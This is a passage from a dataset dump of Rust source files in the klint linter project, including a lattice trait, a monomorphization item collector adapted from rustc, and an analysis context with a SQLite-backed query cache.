for mono_item in mono_items {
if let MonoItem::Fn(instance) = mono_item {
let poly_instance = TypingEnv::fully_monomorphized().as_query_input(instance);
if let Err(Error::TooGeneric) = self.cx.instance_adjustment(poly_instance) {
bug!("monomorphized function should not be too generic");
}
if let Err(Error::TooGeneric) = self.cx.instance_expectation(poly_instance) {
bug!("monomorphized function should not be too generic");
}
}
}
self.cx.encode_mir();
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/lattice.rs | src/lattice.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
/// A [partially ordered set][poset] that has a [greatest lower bound][glb] for any pair of
/// elements in the set.
///
/// Dataflow analyses only require that their domains implement [`JoinSemiLattice`], not
/// `MeetSemiLattice`. However, types that will be used as dataflow domains should implement both
/// so that they can be used with [`Dual`].
///
/// [glb]: https://en.wikipedia.org/wiki/Infimum_and_supremum
/// [poset]: https://en.wikipedia.org/wiki/Partially_ordered_set
pub trait MeetSemiLattice: Eq {
/// Computes the greatest lower bound of two elements, storing the result in `self` and
/// returning `true` if `self` has changed.
///
/// The lattice meet operator is abbreviated as `∧`.
fn meet(&mut self, other: &Self) -> bool;
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/monomorphize_collector.rs | src/monomorphize_collector.rs | // Copyright The Rust Project Developers.
// Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
// This module is from rustc_monomorphize/collector.rs, modified so that
// * All uses are collected, including those that should not be codegen-ed locally.
// * `inlines` field is removed from `InliningMap`.
// * Due to the above reasons, `InliningMap` is renamed to `AccessMap`.
// * `Spanned<MonoItem>` is returned in `AccessMap` instead of just `MonoItem`.
use rustc_data_structures::fx::{FxHashMap, FxIndexMap};
use rustc_data_structures::sync::{MTLock, par_for_each_in};
use rustc_data_structures::unord::UnordSet;
use rustc_hir as hir;
use rustc_hir::attrs::InlineAttr;
use rustc_hir::def::DefKind;
use rustc_hir::def_id::{DefId, DefIdMap, LocalDefId};
use rustc_hir::lang_items::LangItem;
use rustc_hir::limit::Limit;
use rustc_middle::middle::codegen_fn_attrs::CodegenFnAttrFlags;
use rustc_middle::mir::interpret::AllocId;
use rustc_middle::mir::interpret::{ErrorHandled, GlobalAlloc, Scalar};
use rustc_middle::mir::mono::{CollectionMode, MonoItem};
use rustc_middle::mir::visit::Visitor as MirVisitor;
use rustc_middle::mir::{self, Location, MentionedItem, traversal};
use rustc_middle::query::TyCtxtAt;
use rustc_middle::ty::adjustment::{CustomCoerceUnsized, PointerCoercion};
use rustc_middle::ty::layout::ValidityRequirement;
use rustc_middle::ty::{
self, GenericArgs, GenericParamDefKind, Instance, InstanceKind, Ty, TyCtxt, TypeFoldable,
TypeVisitableExt, VtblEntry,
};
use rustc_session::config::{DebugInfo, EntryFnType};
use rustc_span::source_map::{Spanned, dummy_spanned, respan};
use rustc_span::{DUMMY_SP, ErrorGuaranteed, Span};
use rustc_trait_selection::traits;
use std::cell::OnceCell;
// From rustc_monomorphize/errors.rs
#[derive(Diagnostic)]
#[diag(klint_monomorphize_encountered_error_while_instantiating)]
struct EncounteredErrorWhileInstantiating<'tcx> {
#[primary_span]
pub span: Span,
pub kind: &'static str,
pub instance: Instance<'tcx>,
}
#[derive(Diagnostic)]
#[diag(klint_monomorphize_encountered_error_while_instantiating_global_asm)]
struct EncounteredErrorWhileInstantiatingGlobalAsm {
#[primary_span]
pub span: Span,
}
#[derive(Diagnostic)]
#[diag(klint_monomorphize_recursion_limit)]
struct RecursionLimit<'tcx> {
#[primary_span]
pub span: Span,
pub instance: Instance<'tcx>,
#[note]
pub def_span: Span,
pub def_path_str: String,
}
// From rustc_monomorphize/lib.rs
fn custom_coerce_unsize_info<'tcx>(
tcx: TyCtxtAt<'tcx>,
typing_env: ty::TypingEnv<'tcx>,
source_ty: Ty<'tcx>,
target_ty: Ty<'tcx>,
) -> Result<CustomCoerceUnsized, ErrorGuaranteed> {
let trait_ref = ty::TraitRef::new(
tcx.tcx,
tcx.require_lang_item(LangItem::CoerceUnsized, tcx.span),
[source_ty, target_ty],
);
match tcx.codegen_select_candidate(typing_env.as_query_input(trait_ref)) {
Ok(traits::ImplSource::UserDefined(traits::ImplSourceUserDefinedData {
impl_def_id,
..
})) => Ok(tcx.coerce_unsized_info(impl_def_id)?.custom_kind.unwrap()),
impl_source => {
bug!("invalid `CoerceUnsized` impl_source: {:?}", impl_source);
}
}
}
/// The state that is shared across the concurrent threads that are doing collection.
struct SharedState<'tcx> {
/// Items that have been or are currently being recursively collected.
visited: MTLock<UnordSet<MonoItem<'tcx>>>,
/// Items that have been or are currently being recursively treated as "mentioned", i.e., their
/// consts are evaluated but nothing is added to the collection.
mentioned: MTLock<UnordSet<MonoItem<'tcx>>>,
/// Which items are being used where, for better errors.
usage_map: MTLock<UsageMap<'tcx>>,
}
#[derive(PartialEq)]
pub enum MonoItemCollectionStrategy {
Eager,
Lazy,
}
// DIFF: add span, allow iteration
pub struct UsageMap<'tcx> {
// Maps every mono item to the mono items used by it.
pub used_map: FxHashMap<MonoItem<'tcx>, Vec<Spanned<MonoItem<'tcx>>>>,
}
impl<'tcx> UsageMap<'tcx> {
fn new() -> UsageMap<'tcx> {
UsageMap {
used_map: Default::default(),
}
}
fn record_used<'a>(&mut self, user_item: MonoItem<'tcx>, used_items: &'a MonoItems<'tcx>)
where
'tcx: 'a,
{
assert!(
self.used_map
.insert(user_item, used_items.items().collect())
.is_none()
);
}
// Internally iterate over all items and the things each accesses.
pub fn for_each_item_and_its_used_items<F>(&self, mut f: F)
where
F: FnMut(MonoItem<'tcx>, &[Spanned<MonoItem<'tcx>>]),
{
for (&item, used_item) in &self.used_map {
f(item, used_item);
}
}
}
struct MonoItems<'tcx> {
// We want a set of MonoItem + Span where trying to re-insert a MonoItem with a different Span
// is ignored. Map does that, but it looks odd.
items: FxIndexMap<MonoItem<'tcx>, Span>,
}
impl<'tcx> MonoItems<'tcx> {
fn new() -> Self {
Self {
items: FxIndexMap::default(),
}
}
fn is_empty(&self) -> bool {
self.items.is_empty()
}
fn push(&mut self, item: Spanned<MonoItem<'tcx>>) {
// Insert only if the entry does not exist. A normal insert would stomp the first span that
// got inserted.
self.items.entry(item.node).or_insert(item.span);
}
// DIFF: add span
fn items(&self) -> impl Iterator<Item = Spanned<MonoItem<'tcx>>> {
self.items.iter().map(|(item, span)| respan(*span, *item))
}
}
impl<'tcx> IntoIterator for MonoItems<'tcx> {
type Item = Spanned<MonoItem<'tcx>>;
type IntoIter = impl Iterator<Item = Spanned<MonoItem<'tcx>>>;
fn into_iter(self) -> Self::IntoIter {
self.items
.into_iter()
.map(|(item, span)| respan(span, item))
}
}
impl<'tcx> Extend<Spanned<MonoItem<'tcx>>> for MonoItems<'tcx> {
fn extend<I>(&mut self, iter: I)
where
I: IntoIterator<Item = Spanned<MonoItem<'tcx>>>,
{
for item in iter {
self.push(item)
}
}
}
fn collect_items_root<'tcx>(
tcx: TyCtxt<'tcx>,
starting_item: Spanned<MonoItem<'tcx>>,
state: &SharedState<'tcx>,
recursion_limit: Limit,
) {
if !state.visited.lock_mut().insert(starting_item.node) {
// We've been here already, no need to search again.
return;
}
let mut recursion_depths = DefIdMap::default();
collect_items_rec(
tcx,
starting_item,
state,
&mut recursion_depths,
recursion_limit,
CollectionMode::UsedItems,
);
}
/// Collect all monomorphized items reachable from `starting_point`, and emit a note diagnostic if a
/// post-monomorphization error is encountered during a collection step.
///
/// `mode` determined whether we are scanning for [used items][CollectionMode::UsedItems]
/// or [mentioned items][CollectionMode::MentionedItems].
fn collect_items_rec<'tcx>(
tcx: TyCtxt<'tcx>,
starting_item: Spanned<MonoItem<'tcx>>,
state: &SharedState<'tcx>,
recursion_depths: &mut DefIdMap<usize>,
recursion_limit: Limit,
mode: CollectionMode,
) {
let mut used_items = MonoItems::new();
let mut mentioned_items = MonoItems::new();
let recursion_depth_reset;
// Post-monomorphization errors MVP
//
// We can encounter errors while monomorphizing an item, but we don't have a good way of
// showing a complete stack of spans ultimately leading to collecting the erroneous one yet.
// (It's also currently unclear exactly which diagnostics and information would be interesting
// to report in such cases)
//
// This leads to suboptimal error reporting: a post-monomorphization error (PME) will be
// shown with just a spanned piece of code causing the error, without information on where
// it was called from. This is especially obscure if the erroneous mono item is in a
// dependency. See for example issue #85155, where, before minimization, a PME happened two
// crates downstream from libcore's stdarch, without a way to know which dependency was the
// cause.
//
// If such an error occurs in the current crate, its span will be enough to locate the
// source. If the cause is in another crate, the goal here is to quickly locate which mono
// item in the current crate is ultimately responsible for causing the error.
//
// To give at least _some_ context to the user: while collecting mono items, we check the
// error count. If it has changed, a PME occurred, and we trigger some diagnostics about the
// current step of mono items collection.
//
// FIXME: don't rely on global state, instead bubble up errors. Note: this is very hard to do.
let error_count = tcx.dcx().err_count();
// In `mentioned_items` we collect items that were mentioned in this MIR but possibly do not
// need to be monomorphized. This is done to ensure that optimizing away function calls does not
// hide const-eval errors that those calls would otherwise have triggered.
match starting_item.node {
MonoItem::Static(def_id) => {
recursion_depth_reset = None;
// Statics always get evaluated (which is possible because they can't be generic), so for
// `MentionedItems` collection there's nothing to do here.
if mode == CollectionMode::UsedItems {
let instance = Instance::mono(tcx, def_id);
// Sanity check whether this ended up being collected accidentally
debug_assert!(tcx.should_codegen_locally(instance));
let DefKind::Static { nested, .. } = tcx.def_kind(def_id) else {
bug!()
};
// Nested statics have no type.
if !nested {
let ty = instance.ty(tcx, ty::TypingEnv::fully_monomorphized());
visit_drop_use(tcx, ty, true, starting_item.span, &mut used_items);
}
if let Ok(alloc) = tcx.eval_static_initializer(def_id) {
for &prov in alloc.inner().provenance().ptrs().values() {
collect_alloc(tcx, prov.alloc_id(), &mut used_items);
}
}
if tcx.needs_thread_local_shim(def_id) {
used_items.push(respan(
starting_item.span,
MonoItem::Fn(Instance {
def: InstanceKind::ThreadLocalShim(def_id),
args: GenericArgs::empty(),
}),
));
}
}
// mentioned_items stays empty since there's no codegen for statics. statics don't get
// optimized, and if they did then the const-eval interpreter would have to worry about
// mentioned_items.
}
MonoItem::Fn(instance) => {
// Sanity check whether this ended up being collected accidentally
debug_assert!(tcx.should_codegen_locally(instance));
// Keep track of the monomorphization recursion depth
recursion_depth_reset = Some(check_recursion_limit(
tcx,
instance,
starting_item.span,
recursion_depths,
recursion_limit,
));
rustc_data_structures::stack::ensure_sufficient_stack(|| {
let (used, mentioned) = items_of_instance(tcx, (instance, mode));
used_items.extend(used.into_iter().copied());
mentioned_items.extend(mentioned.into_iter().copied());
});
}
MonoItem::GlobalAsm(item_id) => {
assert!(
mode == CollectionMode::UsedItems,
"should never encounter global_asm when collecting mentioned items"
);
recursion_depth_reset = None;
let item = tcx.hir_item(item_id);
if let hir::ItemKind::GlobalAsm { asm, .. } = item.kind {
for (op, op_sp) in asm.operands {
match *op {
hir::InlineAsmOperand::Const { .. } => {
// Only constants which resolve to a plain integer
// are supported. Therefore the value should not
// depend on any other items.
}
hir::InlineAsmOperand::SymFn { expr } => {
let fn_ty = tcx.typeck(item_id.owner_id).expr_ty(expr);
visit_fn_use(tcx, fn_ty, false, *op_sp, &mut used_items);
}
hir::InlineAsmOperand::SymStatic { path: _, def_id } => {
// DIFF: remove should_codegen_locally
trace!("collecting static {:?}", def_id);
used_items.push(dummy_spanned(MonoItem::Static(def_id)));
}
hir::InlineAsmOperand::In { .. }
| hir::InlineAsmOperand::Out { .. }
| hir::InlineAsmOperand::InOut { .. }
| hir::InlineAsmOperand::SplitInOut { .. }
| hir::InlineAsmOperand::Label { .. } => {
span_bug!(*op_sp, "invalid operand type for global_asm!")
}
}
}
} else {
span_bug!(
item.span,
"Mismatch between hir::Item type and MonoItem type"
)
}
// mention_items stays empty as nothing gets optimized here.
}
}
// Check for PMEs and emit a diagnostic if one happened. To try to show relevant edges of the
// mono item graph.
if tcx.dcx().err_count() > error_count
&& starting_item.node.is_generic_fn()
&& starting_item.node.is_user_defined()
{
match starting_item.node {
MonoItem::Fn(instance) => tcx.dcx().emit_note(EncounteredErrorWhileInstantiating {
span: starting_item.span,
kind: "fn",
instance,
}),
MonoItem::Static(def_id) => tcx.dcx().emit_note(EncounteredErrorWhileInstantiating {
span: starting_item.span,
kind: "static",
instance: Instance::new_raw(def_id, GenericArgs::empty()),
}),
MonoItem::GlobalAsm(_) => {
tcx.dcx()
.emit_note(EncounteredErrorWhileInstantiatingGlobalAsm {
span: starting_item.span,
})
}
}
}
// Only updating `usage_map` for used items as otherwise we may be inserting the same item
// multiple times (if it is first 'mentioned' and then later actually used), and the usage map
// logic does not like that.
// This is part of the output of collection and hence only relevant for "used" items.
// ("Mentioned" items are only considered internally during collection.)
if mode == CollectionMode::UsedItems {
state
.usage_map
.lock_mut()
.record_used(starting_item.node, &used_items);
}
{
let mut visited = OnceCell::default();
if mode == CollectionMode::UsedItems {
used_items.items.retain(|k, _| {
visited
.get_mut_or_init(|| state.visited.lock_mut())
.insert(*k)
});
}
let mut mentioned = OnceCell::default();
mentioned_items.items.retain(|k, _| {
!visited.get_or_init(|| state.visited.lock()).contains(k)
&& mentioned
.get_mut_or_init(|| state.mentioned.lock_mut())
.insert(*k)
});
}
if mode == CollectionMode::MentionedItems {
assert!(
used_items.is_empty(),
"'mentioned' collection should never encounter used items"
);
} else {
for used_item in used_items {
let should_gen = match used_item.node {
MonoItem::Static(def_id) => {
let instance = Instance::mono(tcx, def_id);
tcx.should_codegen_locally(instance)
}
MonoItem::Fn(instance) => tcx.should_codegen_locally(instance),
MonoItem::GlobalAsm(_) => true,
};
if should_gen {
collect_items_rec(
tcx,
used_item,
state,
recursion_depths,
recursion_limit,
CollectionMode::UsedItems,
);
}
}
}
// Walk over mentioned items *after* used items, so that if an item is both mentioned and used then
// the loop above has fully collected it, so this loop will skip it.
for mentioned_item in mentioned_items {
let should_gen = match mentioned_item.node {
MonoItem::Static(def_id) => {
let instance = Instance::mono(tcx, def_id);
tcx.should_codegen_locally(instance)
}
MonoItem::Fn(instance) => tcx.should_codegen_locally(instance),
MonoItem::GlobalAsm(_) => true,
};
if should_gen {
collect_items_rec(
tcx,
mentioned_item,
state,
recursion_depths,
recursion_limit,
CollectionMode::MentionedItems,
);
}
}
if let Some((def_id, depth)) = recursion_depth_reset {
recursion_depths.insert(def_id, depth);
}
}
fn check_recursion_limit<'tcx>(
tcx: TyCtxt<'tcx>,
instance: Instance<'tcx>,
span: Span,
recursion_depths: &mut DefIdMap<usize>,
recursion_limit: Limit,
) -> (DefId, usize) {
let def_id = instance.def_id();
let recursion_depth = recursion_depths.get(&def_id).cloned().unwrap_or(0);
debug!(" => recursion depth={}", recursion_depth);
let adjusted_recursion_depth = if Some(def_id) == tcx.lang_items().drop_in_place_fn() {
// HACK: drop_in_place creates tight monomorphization loops. Give
// it more margin.
recursion_depth / 4
} else {
recursion_depth
};
// Code that needs to instantiate the same function recursively
// more than the recursion limit is assumed to be causing an
// infinite expansion.
if !recursion_limit.value_within_limit(adjusted_recursion_depth) {
let def_span = tcx.def_span(def_id);
let def_path_str = tcx.def_path_str(def_id);
tcx.dcx().emit_fatal(RecursionLimit {
span,
instance,
def_span,
def_path_str,
});
}
recursion_depths.insert(def_id, recursion_depth + 1);
(def_id, recursion_depth)
}
struct MirUsedCollector<'a, 'tcx> {
tcx: TyCtxt<'tcx>,
body: &'a mir::Body<'tcx>,
used_items: &'a mut MonoItems<'tcx>,
/// See the comment in `collect_items_of_instance` for the purpose of this set.
/// Note that this contains *not-monomorphized* items!
used_mentioned_items: &'a mut UnordSet<MentionedItem<'tcx>>,
instance: Instance<'tcx>,
}
impl<'a, 'tcx> MirUsedCollector<'a, 'tcx> {
pub fn monomorphize<T>(&self, value: T) -> T
where
T: TypeFoldable<TyCtxt<'tcx>>,
{
debug!("monomorphize: self.instance={:?}", self.instance);
self.instance.instantiate_mir_and_normalize_erasing_regions(
self.tcx,
ty::TypingEnv::fully_monomorphized(),
ty::EarlyBinder::bind(value),
)
}
/// Evaluates a *not yet monomorphized* constant.
fn eval_constant(&mut self, constant: &mir::ConstOperand<'tcx>) -> Option<mir::ConstValue> {
let const_ = self.monomorphize(constant.const_);
// Evaluate the constant. This makes const eval failure a collection-time error (rather than
// a codegen-time error). rustc stops after collection if there was an error, so this
// ensures codegen never has to worry about failing consts.
// (codegen relies on this and ICEs will happen if this is violated.)
match const_.eval(
self.tcx,
ty::TypingEnv::fully_monomorphized(),
constant.span,
) {
Ok(v) => Some(v),
Err(ErrorHandled::TooGeneric(..)) => span_bug!(
constant.span,
"collection encountered polymorphic constant: {:?}",
const_
),
Err(err @ ErrorHandled::Reported(..)) => {
err.emit_note(self.tcx);
return None;
}
}
}
}
impl<'a, 'tcx> MirVisitor<'tcx> for MirUsedCollector<'a, 'tcx> {
fn visit_rvalue(&mut self, rvalue: &mir::Rvalue<'tcx>, location: Location) {
debug!("visiting rvalue {:?}", *rvalue);
let span = self.body.source_info(location).span;
match *rvalue {
// When doing an cast from a regular pointer to a fat pointer, we
// have to instantiate all methods of the trait being cast to, so we
// can build the appropriate vtable.
mir::Rvalue::Cast(
mir::CastKind::PointerCoercion(PointerCoercion::Unsize, _),
ref operand,
target_ty,
) => {
let source_ty = operand.ty(self.body, self.tcx);
// *Before* monomorphizing, record that we already handled this mention.
self.used_mentioned_items.insert(MentionedItem::UnsizeCast {
source_ty,
target_ty,
});
let target_ty = self.monomorphize(target_ty);
let source_ty = self.monomorphize(source_ty);
let (source_ty, target_ty) = find_tails_for_unsizing(
self.tcx.at(span),
ty::TypingEnv::fully_monomorphized(),
source_ty,
target_ty,
);
// This could also be a different Unsize instruction, like
// from a fixed sized array to a slice. But we are only
// interested in things that produce a vtable.
if target_ty.is_trait() && !source_ty.is_trait() {
create_mono_items_for_vtable_methods(
self.tcx,
target_ty,
source_ty,
span,
self.used_items,
);
}
}
mir::Rvalue::Cast(
mir::CastKind::PointerCoercion(PointerCoercion::ReifyFnPointer(_), _),
ref operand,
_,
) => {
let fn_ty = operand.ty(self.body, self.tcx);
// *Before* monomorphizing, record that we already handled this mention.
self.used_mentioned_items.insert(MentionedItem::Fn(fn_ty));
let fn_ty = self.monomorphize(fn_ty);
visit_fn_use(self.tcx, fn_ty, false, span, self.used_items);
}
mir::Rvalue::Cast(
mir::CastKind::PointerCoercion(PointerCoercion::ClosureFnPointer(_), _),
ref operand,
_,
) => {
let source_ty = operand.ty(self.body, self.tcx);
// *Before* monomorphizing, record that we already handled this mention.
self.used_mentioned_items
.insert(MentionedItem::Closure(source_ty));
let source_ty = self.monomorphize(source_ty);
if let ty::Closure(def_id, args) = *source_ty.kind() {
let instance =
Instance::resolve_closure(self.tcx, def_id, args, ty::ClosureKind::FnOnce);
// DIFF: remove should_codegen_locally
self.used_items
.push(create_fn_mono_item(self.tcx, instance, span));
} else {
bug!()
}
}
mir::Rvalue::ThreadLocalRef(def_id) => {
assert!(self.tcx.is_thread_local_static(def_id));
// DIFF: remove should_codegen_locally
trace!("collecting thread-local static {:?}", def_id);
self.used_items.push(respan(span, MonoItem::Static(def_id)));
}
_ => { /* not interesting */ }
}
self.super_rvalue(rvalue, location);
}
/// This does not walk the MIR of the constant as that is not needed for codegen, all we need is
/// to ensure that the constant evaluates successfully and walk the result.
fn visit_const_operand(&mut self, constant: &mir::ConstOperand<'tcx>, _location: Location) {
// No `super_constant` as we don't care about `visit_ty`/`visit_ty_const`.
let Some(val) = self.eval_constant(constant) else {
return;
};
collect_const_value(self.tcx, val, self.used_items);
}
fn visit_terminator(&mut self, terminator: &mir::Terminator<'tcx>, location: Location) {
debug!("visiting terminator {:?} @ {:?}", terminator, location);
let source = self.body.source_info(location).span;
let tcx = self.tcx;
let push_mono_lang_item = |this: &mut Self, lang_item: LangItem| {
let instance = Instance::mono(tcx, tcx.require_lang_item(lang_item, source));
// DIFF: remove should_codegen_locally
this.used_items
.push(create_fn_mono_item(tcx, instance, source));
};
match terminator.kind {
mir::TerminatorKind::Call { ref func, .. }
| mir::TerminatorKind::TailCall { ref func, .. } => {
let callee_ty = func.ty(self.body, tcx);
// *Before* monomorphizing, record that we already handled this mention.
self.used_mentioned_items
.insert(MentionedItem::Fn(callee_ty));
let callee_ty = self.monomorphize(callee_ty);
// HACK(explicit_tail_calls): collect tail calls to `#[track_caller]` functions as indirect,
// because we later call them as such, to prevent issues with ABI incompatibility.
// Ideally we'd replace such tail calls with normal call + return, but this requires
// post-mono MIR optimizations, which we don't yet have.
let force_indirect_call =
if matches!(terminator.kind, mir::TerminatorKind::TailCall { .. })
&& let &ty::FnDef(def_id, args) = callee_ty.kind()
&& let instance = ty::Instance::expect_resolve(
self.tcx,
ty::TypingEnv::fully_monomorphized(),
def_id,
args,
source,
)
&& instance.def.requires_caller_location(self.tcx)
{
true
} else {
false
};
visit_fn_use(
self.tcx,
callee_ty,
!force_indirect_call,
source,
&mut self.used_items,
)
}
mir::TerminatorKind::Drop { ref place, .. } => {
let ty = place.ty(self.body, self.tcx).ty;
// *Before* monomorphizing, record that we already handled this mention.
self.used_mentioned_items.insert(MentionedItem::Drop(ty));
let ty = self.monomorphize(ty);
visit_drop_use(self.tcx, ty, true, source, self.used_items);
}
mir::TerminatorKind::InlineAsm { ref operands, .. } => {
for op in operands {
match *op {
mir::InlineAsmOperand::SymFn { ref value } => {
let fn_ty = value.const_.ty();
// *Before* monomorphizing, record that we already handled this mention.
self.used_mentioned_items.insert(MentionedItem::Fn(fn_ty));
let fn_ty = self.monomorphize(fn_ty);
visit_fn_use(self.tcx, fn_ty, false, source, self.used_items);
}
mir::InlineAsmOperand::SymStatic { def_id } => {
// DIFF: remove should_codegen_locally
trace!("collecting asm sym static {:?}", def_id);
self.used_items
.push(respan(source, MonoItem::Static(def_id)));
}
_ => {}
}
}
}
mir::TerminatorKind::Assert { ref msg, .. } => match &**msg {
mir::AssertKind::BoundsCheck { .. } => {
push_mono_lang_item(self, LangItem::PanicBoundsCheck);
}
mir::AssertKind::MisalignedPointerDereference { .. } => {
push_mono_lang_item(self, LangItem::PanicMisalignedPointerDereference);
}
mir::AssertKind::NullPointerDereference => {
push_mono_lang_item(self, LangItem::PanicNullPointerDereference);
}
mir::AssertKind::InvalidEnumConstruction(_) => {
push_mono_lang_item(self, LangItem::PanicInvalidEnumConstruction);
}
_ => {
push_mono_lang_item(self, msg.panic_function());
}
},
mir::TerminatorKind::UnwindTerminate(reason) => {
push_mono_lang_item(self, reason.lang_item());
}
mir::TerminatorKind::Goto { .. }
| mir::TerminatorKind::SwitchInt { .. }
| mir::TerminatorKind::UnwindResume
| mir::TerminatorKind::Return
| mir::TerminatorKind::Unreachable => {}
mir::TerminatorKind::CoroutineDrop
| mir::TerminatorKind::Yield { .. }
| mir::TerminatorKind::FalseEdge { .. }
| mir::TerminatorKind::FalseUnwind { .. } => bug!(),
}
if let Some(mir::UnwindAction::Terminate(reason)) = terminator.unwind() {
push_mono_lang_item(self, reason.lang_item());
}
self.super_terminator(terminator, location);
}
}
fn visit_drop_use<'tcx>(
tcx: TyCtxt<'tcx>,
ty: Ty<'tcx>,
is_direct_call: bool,
source: Span,
output: &mut MonoItems<'tcx>,
) {
let instance = Instance::resolve_drop_in_place(tcx, ty);
visit_instance_use(tcx, instance, is_direct_call, source, output);
}
fn visit_fn_use<'tcx>(
tcx: TyCtxt<'tcx>,
ty: Ty<'tcx>,
is_direct_call: bool,
source: Span,
output: &mut MonoItems<'tcx>,
) {
if let ty::FnDef(def_id, args) = *ty.kind() {
let instance = if is_direct_call {
ty::Instance::expect_resolve(
tcx,
ty::TypingEnv::fully_monomorphized(),
def_id,
args,
source,
)
} else {
match ty::Instance::resolve_for_fn_ptr(
tcx,
ty::TypingEnv::fully_monomorphized(),
def_id,
args,
) {
Some(instance) => instance,
_ => bug!("failed to resolve instance for {ty}"),
}
};
visit_instance_use(tcx, instance, is_direct_call, source, output);
}
}
fn visit_instance_use<'tcx>(
tcx: TyCtxt<'tcx>,
instance: ty::Instance<'tcx>,
is_direct_call: bool,
source: Span,
output: &mut MonoItems<'tcx>,
) {
debug!(
"visit_item_use({:?}, is_direct_call={:?})",
instance, is_direct_call
);
// DIFF: remove should_codegen_locally
if let Some(intrinsic) = tcx.intrinsic(instance.def_id()) {
// TODO: should I also vendor in autodiff code?
// collect_autodiff_fn(tcx, instance, intrinsic, output);
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | true |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/ctxt.rs | src/ctxt.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use std::any::Any;
use std::marker::PhantomData;
use std::sync::Arc;
use rusqlite::{Connection, OptionalExtension};
use rustc_data_structures::fx::FxHashMap;
use rustc_data_structures::sync::{DynSend, DynSync, MTLock, RwLock};
use rustc_hir::def_id::{CrateNum, LOCAL_CRATE};
use rustc_middle::ty::TyCtxt;
use rustc_serialize::{Decodable, Encodable};
use rustc_session::config::OutputType;
use rustc_span::{DUMMY_SP, Span};
use crate::diagnostic::use_stack::UseSite;
use crate::utils::anymap::AnyMap;
pub(crate) trait Query: 'static {
const NAME: &'static str;
type Key<'tcx>: DynSend + DynSync;
type Value<'tcx>: DynSend + DynSync;
}
pub(crate) trait QueryValueDecodable: Query {
fn encode_value<'tcx>(value: &Self::Value<'tcx>, cx: &mut crate::serde::EncodeContext<'tcx>);
fn decode_value<'a, 'tcx>(cx: &mut crate::serde::DecodeContext<'a, 'tcx>) -> Self::Value<'tcx>;
}
impl<Q: Query> QueryValueDecodable for Q
where
for<'a, 'tcx> Q::Value<'tcx>: Encodable<crate::serde::EncodeContext<'tcx>>
+ Decodable<crate::serde::DecodeContext<'a, 'tcx>>,
{
fn encode_value<'tcx>(value: &Self::Value<'tcx>, cx: &mut crate::serde::EncodeContext<'tcx>) {
Encodable::encode(value, cx)
}
fn decode_value<'a, 'tcx>(cx: &mut crate::serde::DecodeContext<'a, 'tcx>) -> Self::Value<'tcx> {
Decodable::decode(cx)
}
}
pub(crate) trait PersistentQuery: QueryValueDecodable {
type LocalKey<'tcx>: Encodable<crate::serde::EncodeContext<'tcx>>;
fn into_crate_and_local<'tcx>(key: Self::Key<'tcx>) -> (CrateNum, Self::LocalKey<'tcx>);
}
pub struct AnalysisCtxt<'tcx> {
pub tcx: TyCtxt<'tcx>,
pub local_conn: MTLock<Connection>,
pub sql_conn: RwLock<FxHashMap<CrateNum, Option<Arc<MTLock<Connection>>>>>,
pub call_stack: RwLock<Vec<UseSite<'tcx>>>,
pub query_cache: RwLock<AnyMap<dyn Any + DynSend + DynSync>>,
}
// Everything in `AnalysisCtxt` is either `DynSend/DynSync` or `Send/Sync`, but since there're no relation between two right now compiler cannot infer this.
unsafe impl<'tcx> DynSend for AnalysisCtxt<'tcx> {}
unsafe impl<'tcx> DynSync for AnalysisCtxt<'tcx> {}
impl<'tcx> std::ops::Deref for AnalysisCtxt<'tcx> {
type Target = TyCtxt<'tcx>;
fn deref(&self) -> &Self::Target {
&self.tcx
}
}
macro_rules! memoize {
($(#[$attr:meta])* $vis:vis fn $name:ident<$tcx: lifetime>($cx:ident: $($_: ty)? $(, $key:ident: $key_ty:ty)* $(,)?) -> $ret: ty { $($body: tt)* }) => {
#[allow(non_camel_case_types)]
$vis struct $name;
impl crate::ctxt::Query for $name {
const NAME: &'static str = core::stringify!($name);
#[allow(unused_parens)]
type Key<$tcx> = ($($key_ty),*);
type Value<$tcx> = $ret;
}
impl<'tcx> crate::ctxt::AnalysisCtxt<'tcx> {
$vis fn $name(&self, $($key: $key_ty,)*) -> $ret {
$(#[$attr])*
fn $name<$tcx>($cx: &crate::ctxt::AnalysisCtxt<$tcx>, $($key: $key_ty),*) -> $ret {
$($body)*
}
let pack = ($($key),*);
let cache = self.query_cache::<$name>();
{
let guard = cache.borrow();
if let Some(val) = guard.get(&pack) {
return <$ret>::clone(val);
}
}
let val = $name(self, $($key),*);
let mut guard = cache.borrow_mut();
guard.insert(pack, <$ret>::clone(&val));
val
}
}
}
}
const SCHEMA_VERSION: u32 = 1;
impl Drop for AnalysisCtxt<'_> {
fn drop(&mut self) {
self.local_conn.lock().execute("commit", ()).unwrap();
}
}
impl<'tcx> AnalysisCtxt<'tcx> {
pub(crate) fn query_cache<Q: Query>(
&self,
) -> Arc<RwLock<FxHashMap<Q::Key<'tcx>, Q::Value<'tcx>>>> {
let mut guard = self.query_cache.borrow_mut();
let cache = guard
.entry()
.or_insert_with(|| {
let cache = Arc::new(RwLock::new(
FxHashMap::<Q::Key<'static>, Q::Value<'static>>::default(),
));
(PhantomData::<fn() -> Q>, cache)
})
.1
.clone();
// Everything stored inside query_cache is conceptually `'tcx`, but due to limitation
// of `Any` we hack around the lifetime.
unsafe { std::mem::transmute(cache) }
}
pub(crate) fn sql_connection(&self, cnum: CrateNum) -> Option<Arc<MTLock<Connection>>> {
if let Some(v) = self.sql_conn.borrow().get(&cnum) {
return v.clone();
}
let mut guard = self.sql_conn.borrow_mut();
if let Some(v) = guard.get(&cnum) {
return v.clone();
}
let mut result = None;
let mut sysroot = false;
for path in self.tcx.crate_extern_paths(cnum) {
if path.starts_with(&self.sess.opts.sysroot.default) {
sysroot = true;
